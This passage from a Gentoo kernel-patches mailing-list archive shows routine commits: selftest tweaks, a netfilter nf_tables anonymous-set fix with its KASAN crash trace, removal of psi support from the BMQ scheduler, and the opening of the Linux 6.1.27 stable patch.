++++ b/tools/testing/selftests/resctrl/cat_test.c
+@@ -40,7 +40,7 @@ static int cat_setup(int num, ...)
+ 
+ 	/* Run NUM_OF_RUNS times */
+ 	if (p->num_of_runs >= NUM_OF_RUNS)
+-		return -1;
++		return END_OF_TESTS;
+ 
+ 	if (p->num_of_runs == 0) {
+ 		sprintf(schemata, "%lx", p->mask);
+diff --git a/tools/testing/selftests/resctrl/cmt_test.c b/tools/testing/selftests/resctrl/cmt_test.c
+index 8968e36db99d7..3b0454e7fc826 100644
+--- a/tools/testing/selftests/resctrl/cmt_test.c
++++ b/tools/testing/selftests/resctrl/cmt_test.c
+@@ -32,7 +32,7 @@ static int cmt_setup(int num, ...)
+ 
+ 	/* Run NUM_OF_RUNS times */
+ 	if (p->num_of_runs >= NUM_OF_RUNS)
+-		return -1;
++		return END_OF_TESTS;
+ 
+ 	p->num_of_runs++;
+ 
+diff --git a/tools/testing/selftests/resctrl/fill_buf.c b/tools/testing/selftests/resctrl/fill_buf.c
+index 56ccbeae0638d..c20d0a7ecbe63 100644
+--- a/tools/testing/selftests/resctrl/fill_buf.c
++++ b/tools/testing/selftests/resctrl/fill_buf.c
+@@ -68,6 +68,8 @@ static void *malloc_and_init_memory(size_t s)
+ 	size_t s64;
+ 
+ 	void *p = memalign(PAGE_SIZE, s);
++	if (!p)
++		return NULL;
+ 
+ 	p64 = (uint64_t *)p;
+ 	s64 = s / sizeof(uint64_t);
+diff --git a/tools/testing/selftests/resctrl/mba_test.c b/tools/testing/selftests/resctrl/mba_test.c
+index 1a1bdb6180cf2..97dc98c0c9497 100644
+--- a/tools/testing/selftests/resctrl/mba_test.c
++++ b/tools/testing/selftests/resctrl/mba_test.c
+@@ -28,6 +28,7 @@ static int mba_setup(int num, ...)
+ 	struct resctrl_val_param *p;
+ 	char allocation_str[64];
+ 	va_list param;
++	int ret;
+ 
+ 	va_start(param, num);
+ 	p = va_arg(param, struct resctrl_val_param *);
+@@ -41,11 +42,15 @@ static int mba_setup(int num, ...)
+ 		return 0;
+ 
+ 	if (allocation < ALLOCATION_MIN || allocation > ALLOCATION_MAX)
+-		return -1;
++		return END_OF_TESTS;
+ 
+ 	sprintf(allocation_str, "%d", allocation);
+ 
+-	write_schemata(p->ctrlgrp, allocation_str, p->cpu_no, p->resctrl_val);
++	ret = write_schemata(p->ctrlgrp, allocation_str, p->cpu_no,
++			     p->resctrl_val);
++	if (ret < 0)
++		return ret;
++
+ 	allocation -= ALLOCATION_STEP;
+ 
+ 	return 0;
+diff --git a/tools/testing/selftests/resctrl/mbm_test.c b/tools/testing/selftests/resctrl/mbm_test.c
+index 8392e5c55ed02..280187628054d 100644
+--- a/tools/testing/selftests/resctrl/mbm_test.c
++++ b/tools/testing/selftests/resctrl/mbm_test.c
+@@ -95,7 +95,7 @@ static int mbm_setup(int num, ...)
+ 
+ 	/* Run NUM_OF_RUNS times */
+ 	if (num_of_runs++ >= NUM_OF_RUNS)
+-		return -1;
++		return END_OF_TESTS;
+ 
+ 	va_start(param, num);
+ 	p = va_arg(param, struct resctrl_val_param *);
+diff --git a/tools/testing/selftests/resctrl/resctrl.h b/tools/testing/selftests/resctrl/resctrl.h
+index f0ded31fb3c7c..f44fa2de4d986 100644
+--- a/tools/testing/selftests/resctrl/resctrl.h
++++ b/tools/testing/selftests/resctrl/resctrl.h
+@@ -37,6 +37,8 @@
+ #define ARCH_INTEL     1
+ #define ARCH_AMD       2
+ 
++#define END_OF_TESTS	1
++
+ #define PARENT_EXIT(err_msg)			\
+ 	do {					\
+ 		perror(err_msg);		\
+diff --git a/tools/testing/selftests/resctrl/resctrl_val.c b/tools/testing/selftests/resctrl/resctrl_val.c
+index b32b96356ec70..00864242d76c6 100644
+--- a/tools/testing/selftests/resctrl/resctrl_val.c
++++ b/tools/testing/selftests/resctrl/resctrl_val.c
+@@ -734,29 +734,24 @@ int resctrl_val(char **benchmark_cmd, struct resctrl_val_param *param)
+ 
+ 	/* Test runs until the callback setup() tells the test to stop. */
+ 	while (1) {
++		ret = param->setup(1, param);
++		if (ret == END_OF_TESTS) {
++			ret = 0;
++			break;
++		}
++		if (ret < 0)
++			break;
++
+ 		if (!strncmp(resctrl_val, MBM_STR, sizeof(MBM_STR)) ||
+ 		    !strncmp(resctrl_val, MBA_STR, sizeof(MBA_STR))) {
+-			ret = param->setup(1, param);
+-			if (ret) {
+-				ret = 0;
+-				break;
+-			}
+-
+ 			ret = measure_vals(param, &bw_resc_start);
+ 			if (ret)
+ 				break;
+ 		} else if (!strncmp(resctrl_val, CMT_STR, sizeof(CMT_STR))) {
+-			ret = param->setup(1, param);
+-			if (ret) {
+-				ret = 0;
+-				break;
+-			}
+ 			sleep(1);
+ 			ret = measure_cache_vals(param, bm_pid);
+ 			if (ret)
+ 				break;
+-		} else {
+-			break;
+ 		}
+ 	}
+ 
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/fq.json b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/fq.json
+index 8acb904d14193..3593fb8f79ad3 100644
+--- a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/fq.json
++++ b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/fq.json
+@@ -114,6 +114,28 @@
+             "$IP link del dev $DUMMY type dummy"
+         ]
+     },
++    {
++        "id": "10f7",
++        "name": "Create FQ with invalid initial_quantum setting",
++        "category": [
++            "qdisc",
++            "fq"
++        ],
++        "plugins": {
++            "requires": "nsPlugin"
++        },
++        "setup": [
++            "$IP link add dev $DUMMY type dummy || /bin/true"
++        ],
++        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root fq initial_quantum 0x80000000",
++        "expExitCode": "2",
++        "verifyCmd": "$TC qdisc show dev $DUMMY",
++        "matchPattern": "qdisc fq 1: root.*initial_quantum 2048Mb",
++        "matchCount": "0",
++        "teardown": [
++            "$IP link del dev $DUMMY type dummy"
++        ]
++    },
+     {
+         "id": "9398",
+         "name": "Create FQ with maxrate setting",
+diff --git a/tools/testing/selftests/user_events/ftrace_test.c b/tools/testing/selftests/user_events/ftrace_test.c
+index 404a2713dcae8..1bc26e6476fc3 100644
+--- a/tools/testing/selftests/user_events/ftrace_test.c
++++ b/tools/testing/selftests/user_events/ftrace_test.c
+@@ -294,6 +294,11 @@ TEST_F(user, write_events) {
+ 	ASSERT_NE(-1, writev(self->data_fd, (const struct iovec *)io, 3));
+ 	after = trace_bytes();
+ 	ASSERT_GT(after, before);
++
++	/* Negative index should fail with EINVAL */
++	reg.write_index = -1;
++	ASSERT_EQ(-1, writev(self->data_fd, (const struct iovec *)io, 3));
++	ASSERT_EQ(EINVAL, errno);
+ }
+ 
+ TEST_F(user, write_fault) {


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-05-10 17:54 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-05-10 17:54 UTC (permalink / raw
  To: gentoo-commits

commit:     c2a4766b45c38541eebdfb6ce7b55bcce87c962d
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed May 10 17:53:24 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed May 10 17:53:24 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=c2a4766b

netfilter: nf_tables: deactivate anonymous set from preparation phase

Bug: https://bugs.gentoo.org/90606

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |   4 +
 ...nf-tables-make-deleted-anon-sets-inactive.patch | 121 +++++++++++++++++++++
 2 files changed, 125 insertions(+)

diff --git a/0000_README b/0000_README
index 5e14a47f..1f28562c 100644
--- a/0000_README
+++ b/0000_README
@@ -159,6 +159,10 @@ Patch:  1510_fs-enable-link-security-restrictions-by-default.patch
 From:   http://sources.debian.net/src/linux/3.16.7-ckt4-3/debian/patches/debian/fs-enable-link-security-restrictions-by-default.patch/
 Desc:   Enable link security restrictions by default.
 
+Patch:  1520_fs-enable-link-security-restrictions-by-default.patch
+From:   https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/?id=c1592a89942e9678f7d9c8030efa777c0d57edab
+Desc:   netfilter: nf_tables: deactivate anonymous set from preparation phase
+
 Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 

diff --git a/1520_nf-tables-make-deleted-anon-sets-inactive.patch b/1520_nf-tables-make-deleted-anon-sets-inactive.patch
new file mode 100644
index 00000000..cd75de5c
--- /dev/null
+++ b/1520_nf-tables-make-deleted-anon-sets-inactive.patch
@@ -0,0 +1,121 @@
+From c1592a89942e9678f7d9c8030efa777c0d57edab Mon Sep 17 00:00:00 2001
+From: Pablo Neira Ayuso <pablo@netfilter.org>
+Date: Tue, 2 May 2023 10:25:24 +0200
+Subject: netfilter: nf_tables: deactivate anonymous set from preparation phase
+
+Toggle deleted anonymous sets as inactive in the next generation, so
+users cannot perform any update on it. Clear the generation bitmask
+in case the transaction is aborted.
+
+The following KASAN splat shows a set element deletion for a bound
+anonymous set that has been already removed in the same transaction.
+
+[   64.921510] ==================================================================
+[   64.923123] BUG: KASAN: wild-memory-access in nf_tables_commit+0xa24/0x1490 [nf_tables]
+[   64.924745] Write of size 8 at addr dead000000000122 by task test/890
+[   64.927903] CPU: 3 PID: 890 Comm: test Not tainted 6.3.0+ #253
+[   64.931120] Call Trace:
+[   64.932699]  <TASK>
+[   64.934292]  dump_stack_lvl+0x33/0x50
+[   64.935908]  ? nf_tables_commit+0xa24/0x1490 [nf_tables]
+[   64.937551]  kasan_report+0xda/0x120
+[   64.939186]  ? nf_tables_commit+0xa24/0x1490 [nf_tables]
+[   64.940814]  nf_tables_commit+0xa24/0x1490 [nf_tables]
+[   64.942452]  ? __kasan_slab_alloc+0x2d/0x60
+[   64.944070]  ? nf_tables_setelem_notify+0x190/0x190 [nf_tables]
+[   64.945710]  ? kasan_set_track+0x21/0x30
+[   64.947323]  nfnetlink_rcv_batch+0x709/0xd90 [nfnetlink]
+[   64.948898]  ? nfnetlink_rcv_msg+0x480/0x480 [nfnetlink]
+
+Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
+---
+ include/net/netfilter/nf_tables.h |  1 +
+ net/netfilter/nf_tables_api.c     | 12 ++++++++++++
+ net/netfilter/nft_dynset.c        |  2 +-
+ net/netfilter/nft_lookup.c        |  2 +-
+ net/netfilter/nft_objref.c        |  2 +-
+ 5 files changed, 16 insertions(+), 3 deletions(-)
+
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 3ed21d2d56590..2e24ea1d744c2 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -619,6 +619,7 @@ struct nft_set_binding {
+ };
+ 
+ enum nft_trans_phase;
++void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set);
+ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      struct nft_set_binding *binding,
+ 			      enum nft_trans_phase phase);
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 8b6c61a2196cb..59fb8320ab4d7 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -5127,12 +5127,24 @@ static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 	}
+ }
+ 
++void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	if (nft_set_is_anonymous(set))
++		nft_clear(ctx->net, set);
++
++	set->use++;
++}
++EXPORT_SYMBOL_GPL(nf_tables_activate_set);
++
+ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      struct nft_set_binding *binding,
+ 			      enum nft_trans_phase phase)
+ {
+ 	switch (phase) {
+ 	case NFT_TRANS_PREPARE:
++		if (nft_set_is_anonymous(set))
++			nft_deactivate_next(ctx->net, set);
++
+ 		set->use--;
+ 		return;
+ 	case NFT_TRANS_ABORT:
+diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
+index 274579b1696e0..bd19c7aec92ee 100644
+--- a/net/netfilter/nft_dynset.c
++++ b/net/netfilter/nft_dynset.c
+@@ -342,7 +342,7 @@ static void nft_dynset_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_dynset *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_dynset_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
+index cecf8ab90e58f..03ef4fdaa460b 100644
+--- a/net/netfilter/nft_lookup.c
++++ b/net/netfilter/nft_lookup.c
+@@ -167,7 +167,7 @@ static void nft_lookup_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_lookup *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_lookup_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_objref.c b/net/netfilter/nft_objref.c
+index cb37169608bab..a48dd5b5d45b1 100644
+--- a/net/netfilter/nft_objref.c
++++ b/net/netfilter/nft_objref.c
+@@ -185,7 +185,7 @@ static void nft_objref_map_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_objref_map *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_objref_map_destroy(const struct nft_ctx *ctx,
+-- 
+cgit 
+


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-05-10 16:18 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-05-10 16:18 UTC (permalink / raw
  To: gentoo-commits

commit:     0e55467b3ca9ea55712b0ccee496a00d8a5c007f
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed May 10 16:11:31 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed May 10 16:11:31 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0e55467b

sched/alt: Remove psi support

Bug: https://bugs.gentoo.org/904514

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                               |  4 ++
 5022_BMQ-and-PDS-remove-psi-support.patch | 94 +++++++++++++++++++++++++++++++
 2 files changed, 98 insertions(+)

diff --git a/0000_README b/0000_README
index 92e8a587..5e14a47f 100644
--- a/0000_README
+++ b/0000_README
@@ -206,3 +206,7 @@ Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incl
 Patch:  5021_BMQ-and-PDS-gentoo-defaults.patch
 From:   https://gitweb.gentoo.org/proj/linux-patches.git/
 Desc:   Set defaults for BMQ. Add archs as people test, default to N
+
+Patch:  5022_BMQ-and-PDS-remove-psi-support.patch
+From:   https://gitweb.gentoo.org/proj/linux-patches.git/
+Desc:   Sched/alt: Remove psi support 

diff --git a/5022_BMQ-and-PDS-remove-psi-support.patch b/5022_BMQ-and-PDS-remove-psi-support.patch
new file mode 100644
index 00000000..4390e2d5
--- /dev/null
+++ b/5022_BMQ-and-PDS-remove-psi-support.patch
@@ -0,0 +1,94 @@
+From 542887ccaeadc65843ec171bccc87f8aa8bbca95 Mon Sep 17 00:00:00 2001
+From: Alfred Chen <cchalpha@gmail.com>
+Date: Wed, 26 Apr 2023 16:38:14 +0000
+Subject: [PATCH] sched/alt: Remove psi support
+
+There are issues(#70, #72, #79) with psi support. Removing the
+support of psi as it doesn't bring much gain.
+---
+ init/Kconfig             | 1 +
+ kernel/sched/alt_core.c  | 8 --------
+ kernel/sched/alt_sched.h | 1 -
+ 3 files changed, 1 insertion(+), 9 deletions(-)
+
+diff --git a/init/Kconfig b/init/Kconfig
+index 454f792df9dd..dff86592555a 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -629,6 +629,7 @@ config TASK_IO_ACCOUNTING
+ 
+ config PSI
+ 	bool "Pressure stall information tracking"
++	depends on !SCHED_ALT
+ 	help
+ 	  Collect metrics that indicate how overcommitted the CPU, memory,
+ 	  and IO capacity are in the system.
+diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
+index af4d840d4bb7..37dfdc41d2a7 100644
+--- a/kernel/sched/alt_core.c
++++ b/kernel/sched/alt_core.c
+@@ -588,7 +588,6 @@ static void update_rq_clock_task(struct rq *rq, s64 delta)
+ 
+ 	rq->prev_irq_time += irq_delta;
+ 	delta -= irq_delta;
+-	psi_account_irqtime(rq->curr, irq_delta);
+ #endif
+ #ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
+ 	if (static_key_false((&paravirt_steal_rq_enabled))) {
+@@ -769,7 +768,6 @@ unsigned long get_wchan(struct task_struct *p)
+  */
+ #define __SCHED_DEQUEUE_TASK(p, rq, flags, func)				\
+ 	sched_info_dequeue(rq, p);						\
+-	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
+ 										\
+ 	list_del(&p->sq_node);							\
+ 	if (list_empty(&rq->queue.heads[p->sq_idx])) { 				\
+@@ -779,7 +777,6 @@ unsigned long get_wchan(struct task_struct *p)
+ 
+ #define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
+ 	sched_info_enqueue(rq, p);					\
+-	psi_enqueue(p, flags & ENQUEUE_WAKEUP);				\
+ 									\
+ 	p->sq_idx = task_sched_prio_idx(p, rq);				\
+ 	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
+@@ -2954,7 +2951,6 @@ static int try_to_wake_up(struct task_struct *p, unsigned int state,
+ 		}
+ 
+ 		wake_flags |= WF_MIGRATED;
+-		psi_ttwu_dequeue(p);
+ 		set_task_cpu(p, cpu);
+ 	}
+ #else
+@@ -4828,8 +4824,6 @@ static void __sched notrace __schedule(unsigned int sched_mode)
+ 		 */
+ 		++*switch_count;
+ 
+-		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
+-
+ 		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
+ 
+ 		/* Also unlocks the rq: */
+@@ -7689,8 +7683,6 @@ void __init sched_init(void)
+ 	sched_init_topology_cpumask_early();
+ #endif /* SMP */
+ 
+-	psi_init();
+-
+ 	preempt_dynamic_init();
+ }
+ 
+diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
+index 9fe45bf0cedf..55a15b806e87 100644
+--- a/kernel/sched/alt_sched.h
++++ b/kernel/sched/alt_sched.h
+@@ -3,7 +3,6 @@
+ 
+ #include <linux/context_tracking.h>
+ #include <linux/profile.h>
+-#include <linux/psi.h>
+ #include <linux/stop_machine.h>
+ #include <linux/syscalls.h>
+ #include <linux/tick.h>
+-- 
+GitLab
+


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-04-30 23:50 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-04-30 23:50 UTC (permalink / raw
  To: gentoo-commits

commit:     2a437e58f60cda8d56e9fc7d09c27b88d0f319f6
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Sun Apr 30 23:50:47 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Sun Apr 30 23:50:47 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2a437e58

Linux patch 6.1.27

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |   4 +
 1026_linux-6.1.27.patch | 914 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 918 insertions(+)

diff --git a/0000_README b/0000_README
index 2dab4c18..92e8a587 100644
--- a/0000_README
+++ b/0000_README
@@ -147,6 +147,10 @@ Patch:  1025_linux-6.1.26.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.26
 
+Patch:  1026_linux-6.1.27.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.27
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1026_linux-6.1.27.patch b/1026_linux-6.1.27.patch
new file mode 100644
index 00000000..be1b81be
--- /dev/null
+++ b/1026_linux-6.1.27.patch
@@ -0,0 +1,914 @@
+diff --git a/Documentation/riscv/vm-layout.rst b/Documentation/riscv/vm-layout.rst
+index 5b36e45fef60b..edb5331287126 100644
+--- a/Documentation/riscv/vm-layout.rst
++++ b/Documentation/riscv/vm-layout.rst
+@@ -47,7 +47,7 @@ RISC-V Linux Kernel SV39
+                                                               | Kernel-space virtual memory, shared between all processes:
+   ____________________________________________________________|___________________________________________________________
+                     |            |                  |         |
+-   ffffffc6fee00000 | -228    GB | ffffffc6feffffff |    2 MB | fixmap
++   ffffffc6fea00000 | -228    GB | ffffffc6feffffff |    6 MB | fixmap
+    ffffffc6ff000000 | -228    GB | ffffffc6ffffffff |   16 MB | PCI io
+    ffffffc700000000 | -228    GB | ffffffc7ffffffff |    4 GB | vmemmap
+    ffffffc800000000 | -224    GB | ffffffd7ffffffff |   64 GB | vmalloc/ioremap space
+@@ -83,7 +83,7 @@ RISC-V Linux Kernel SV48
+                                                               | Kernel-space virtual memory, shared between all processes:
+   ____________________________________________________________|___________________________________________________________
+                     |            |                  |         |
+-   ffff8d7ffee00000 |  -114.5 TB | ffff8d7ffeffffff |    2 MB | fixmap
++   ffff8d7ffea00000 |  -114.5 TB | ffff8d7ffeffffff |    6 MB | fixmap
+    ffff8d7fff000000 |  -114.5 TB | ffff8d7fffffffff |   16 MB | PCI io
+    ffff8d8000000000 |  -114.5 TB | ffff8f7fffffffff |    2 TB | vmemmap
+    ffff8f8000000000 |  -112.5 TB | ffffaf7fffffffff |   32 TB | vmalloc/ioremap space
+diff --git a/Makefile b/Makefile
+index d2eff3747f2f7..a5cfcd0a85a9e 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 26
++SUBLEVEL = 27
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm64/kvm/mmu.c b/arch/arm64/kvm/mmu.c
+index 019472dd98ff7..54ccdcc2dbdf7 100644
+--- a/arch/arm64/kvm/mmu.c
++++ b/arch/arm64/kvm/mmu.c
+@@ -1178,6 +1178,20 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ 		return -EFAULT;
+ 	}
+ 
++	/*
++	 * Permission faults just need to update the existing leaf entry,
++	 * and so normally don't require allocations from the memcache. The
++	 * only exception to this is when dirty logging is enabled at runtime
++	 * and a write fault needs to collapse a block entry into a table.
++	 */
++	if (fault_status != FSC_PERM ||
++	    (logging_active && write_fault)) {
++		ret = kvm_mmu_topup_memory_cache(memcache,
++						 kvm_mmu_cache_min_pages(kvm));
++		if (ret)
++			return ret;
++	}
++
+ 	/*
+ 	 * Let's check if we will get back a huge page backed by hugetlbfs, or
+ 	 * get block mapping for device MMIO region.
+@@ -1234,36 +1248,17 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ 		fault_ipa &= ~(vma_pagesize - 1);
+ 
+ 	gfn = fault_ipa >> PAGE_SHIFT;
+-	mmap_read_unlock(current->mm);
+-
+-	/*
+-	 * Permission faults just need to update the existing leaf entry,
+-	 * and so normally don't require allocations from the memcache. The
+-	 * only exception to this is when dirty logging is enabled at runtime
+-	 * and a write fault needs to collapse a block entry into a table.
+-	 */
+-	if (fault_status != FSC_PERM || (logging_active && write_fault)) {
+-		ret = kvm_mmu_topup_memory_cache(memcache,
+-						 kvm_mmu_cache_min_pages(kvm));
+-		if (ret)
+-			return ret;
+-	}
+ 
+-	mmu_seq = vcpu->kvm->mmu_invalidate_seq;
+ 	/*
+-	 * Ensure the read of mmu_invalidate_seq happens before we call
+-	 * gfn_to_pfn_prot (which calls get_user_pages), so that we don't risk
+-	 * the page we just got a reference to gets unmapped before we have a
+-	 * chance to grab the mmu_lock, which ensure that if the page gets
+-	 * unmapped afterwards, the call to kvm_unmap_gfn will take it away
+-	 * from us again properly. This smp_rmb() interacts with the smp_wmb()
+-	 * in kvm_mmu_notifier_invalidate_<page|range_end>.
++	 * Read mmu_invalidate_seq so that KVM can detect if the results of
++	 * vma_lookup() or __gfn_to_pfn_memslot() become stale prior to
++	 * acquiring kvm->mmu_lock.
+ 	 *
+-	 * Besides, __gfn_to_pfn_memslot() instead of gfn_to_pfn_prot() is
+-	 * used to avoid unnecessary overhead introduced to locate the memory
+-	 * slot because it's always fixed even @gfn is adjusted for huge pages.
++	 * Rely on mmap_read_unlock() for an implicit smp_rmb(), which pairs
++	 * with the smp_wmb() in kvm_mmu_invalidate_end().
+ 	 */
+-	smp_rmb();
++	mmu_seq = vcpu->kvm->mmu_invalidate_seq;
++	mmap_read_unlock(current->mm);
+ 
+ 	pfn = __gfn_to_pfn_memslot(memslot, gfn, false, NULL,
+ 				   write_fault, &writable, NULL);
+diff --git a/arch/riscv/include/asm/fixmap.h b/arch/riscv/include/asm/fixmap.h
+index 5c3e7b97fcc6f..0a55099bb7349 100644
+--- a/arch/riscv/include/asm/fixmap.h
++++ b/arch/riscv/include/asm/fixmap.h
+@@ -22,6 +22,14 @@
+  */
+ enum fixed_addresses {
+ 	FIX_HOLE,
++	/*
++	 * The fdt fixmap mapping must be PMD aligned and will be mapped
++	 * using PMD entries in fixmap_pmd in 64-bit and a PGD entry in 32-bit.
++	 */
++	FIX_FDT_END,
++	FIX_FDT = FIX_FDT_END + FIX_FDT_SIZE / PAGE_SIZE - 1,
++
++	/* Below fixmaps will be mapped using fixmap_pte */
+ 	FIX_PTE,
+ 	FIX_PMD,
+ 	FIX_PUD,
+diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
+index 92ec2d9d7273f..2aeaf8e3a4ab0 100644
+--- a/arch/riscv/include/asm/pgtable.h
++++ b/arch/riscv/include/asm/pgtable.h
+@@ -87,9 +87,13 @@
+ 
+ #define FIXADDR_TOP      PCI_IO_START
+ #ifdef CONFIG_64BIT
+-#define FIXADDR_SIZE     PMD_SIZE
++#define MAX_FDT_SIZE	 PMD_SIZE
++#define FIX_FDT_SIZE	 (MAX_FDT_SIZE + SZ_2M)
++#define FIXADDR_SIZE     (PMD_SIZE + FIX_FDT_SIZE)
+ #else
+-#define FIXADDR_SIZE     PGDIR_SIZE
++#define MAX_FDT_SIZE	 PGDIR_SIZE
++#define FIX_FDT_SIZE	 MAX_FDT_SIZE
++#define FIXADDR_SIZE     (PGDIR_SIZE + FIX_FDT_SIZE)
+ #endif
+ #define FIXADDR_START    (FIXADDR_TOP - FIXADDR_SIZE)
+ 
+diff --git a/arch/riscv/kernel/setup.c b/arch/riscv/kernel/setup.c
+index 86acd690d5293..2acf51c235673 100644
+--- a/arch/riscv/kernel/setup.c
++++ b/arch/riscv/kernel/setup.c
+@@ -278,12 +278,8 @@ void __init setup_arch(char **cmdline_p)
+ #if IS_ENABLED(CONFIG_BUILTIN_DTB)
+ 	unflatten_and_copy_device_tree();
+ #else
+-	if (early_init_dt_verify(__va(XIP_FIXUP(dtb_early_pa))))
+-		unflatten_device_tree();
+-	else
+-		pr_err("No DTB found in kernel mappings\n");
++	unflatten_device_tree();
+ #endif
+-	early_init_fdt_scan_reserved_mem();
+ 	misc_mem_init();
+ 
+ 	init_resources();
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 50a1b6edd4918..6f47ced3175b4 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -57,7 +57,6 @@ unsigned long empty_zero_page[PAGE_SIZE / sizeof(unsigned long)]
+ EXPORT_SYMBOL(empty_zero_page);
+ 
+ extern char _start[];
+-#define DTB_EARLY_BASE_VA      PGDIR_SIZE
+ void *_dtb_early_va __initdata;
+ uintptr_t _dtb_early_pa __initdata;
+ 
+@@ -236,31 +235,22 @@ static void __init setup_bootmem(void)
+ 	set_max_mapnr(max_low_pfn - ARCH_PFN_OFFSET);
+ 
+ 	reserve_initrd_mem();
++
++	/*
++	 * No allocation should be done before reserving the memory as defined
++	 * in the device tree, otherwise the allocation could end up in a
++	 * reserved region.
++	 */
++	early_init_fdt_scan_reserved_mem();
++
+ 	/*
+ 	 * If DTB is built in, no need to reserve its memblock.
+ 	 * Otherwise, do reserve it but avoid using
+ 	 * early_init_fdt_reserve_self() since __pa() does
+ 	 * not work for DTB pointers that are fixmap addresses
+ 	 */
+-	if (!IS_ENABLED(CONFIG_BUILTIN_DTB)) {
+-		/*
+-		 * In case the DTB is not located in a memory region we won't
+-		 * be able to locate it later on via the linear mapping and
+-		 * get a segfault when accessing it via __va(dtb_early_pa).
+-		 * To avoid this situation copy DTB to a memory region.
+-		 * Note that memblock_phys_alloc will also reserve DTB region.
+-		 */
+-		if (!memblock_is_memory(dtb_early_pa)) {
+-			size_t fdt_size = fdt_totalsize(dtb_early_va);
+-			phys_addr_t new_dtb_early_pa = memblock_phys_alloc(fdt_size, PAGE_SIZE);
+-			void *new_dtb_early_va = early_memremap(new_dtb_early_pa, fdt_size);
+-
